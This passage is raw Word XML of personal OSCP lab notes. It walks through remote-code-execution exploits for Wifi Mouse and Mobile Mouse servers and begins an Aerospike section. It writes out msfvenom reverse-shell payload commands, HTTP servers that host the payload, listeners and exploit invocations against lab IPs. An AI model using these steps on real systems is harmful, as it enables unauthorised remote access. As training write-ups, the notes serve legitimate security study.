          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003834">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Now, to exploit it, I tried multiple exploits. The first one that came up for Wifi Mouse 1.7.8.5 was Exploit-DB 49601, but this was version 1, and it didn't seem to work. At least I'm not sure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003835">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And then I tried version 2, which was ExploitDB 50972. This actually had a python error just like the last one, but I looked at Discord, and apparently it works when you download locally from searchsploit! It must be some formatting issues when you try curling it or downloading it from exploitdb.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>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searchsploit -m 50972</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003837">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This downloads the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003838">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To run the command, look at the usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USAGE: python 50972.py &lt;target-ip&gt; &lt;local-http-server-ip&gt; &lt;payload-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>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target-ip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the IP of the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>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local-http-server-ip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the IP of our Kali, since we need to host HTTP server with a reverse shell on it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>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payload-name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the name of our reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383D">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First, we have to start a HTTP server on our Kali. We can use python!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>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python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383F">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Then, we can create a reverse shell inside of the directory where python is hosted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>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msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.232 LPORT=4444 -f exe &gt; reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003841">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3842">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>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-lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003843">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Now we can run the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>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 50972.py 192.168.236.145 192.168.45.232 reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003845">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We should have shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003846">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003847">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003848">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mknfx6ofc4x2" w:id="528"/>
      <w:bookmarkEnd w:id="528"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile Mouse Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003849">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-C .155 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on port 9099</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, I looked at the NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="816"/>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016000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="194" name="image195.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image195.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122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384D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This looks like there is a Mobile Mouse Server on port 9099. The Mouse Server applications are usually vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, I searched up Mobile Mouse Server exploit and found Mobile Mouse 3.6.0.4 RCE which is CVE-2023-31902</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000384F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I first tried exploitDB 51010, but that didn't work. It didn't even successfully download the rev shell I was hosting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003850">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, I looked at Discord, and found this more stable exploit:</w:t>
      </w:r>
      <w:hyperlink r:id="rId1224">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1225">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/KryoCeph/Mobile-Mouse-3.6.0.4-Exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003851">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The way it works is it works in 2 steps: an upload and then a execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003852">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I first made a rev shell that connected to port 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="816"/>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msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.232 LPORT=80 -f exe &gt; reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003854">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then if you read the source code on the exploit, it tries to download a file from your Kali using port 8080. So start a python host on port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="816"/>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python3 -m http.server 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003856">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, you download upload.py, and then use it to upload the rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003857">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="816"/>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upload.py --target 192.168.239.155 --file reverse.exe --lhost 192.168.45.197</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003858">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check to see if your python host says that someone tried downloading your reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="144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385A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="816"/>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penelope -p 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you download execute.py and then use it to execute the uploaded reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="816"/>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execute.py --target 192.168.239.155 --file reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="816"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it should work!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000385F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003860">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003861">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003862">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yubb81q1emxw" w:id="529"/>
      <w:bookmarkEnd w:id="529"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aerospike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003863">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003864">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP-A .143</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003865">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003866">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This was an aerospike 5.0.1.1 exploit (I hear it also works on 5.0.1.3 and anything below)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003867">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the exploitDB, it says "Version: &lt; 5.1.0.3"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003868">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Anyways, there were two ways to find out about aerospike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003869">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first way was to ffuf the website, see an API endpoint that was forbidden, ffuf that endpoint, see heartbeat endpoint, look at it, and then see Aerospike is running</w:t>
      </w:r>
    </w:p>
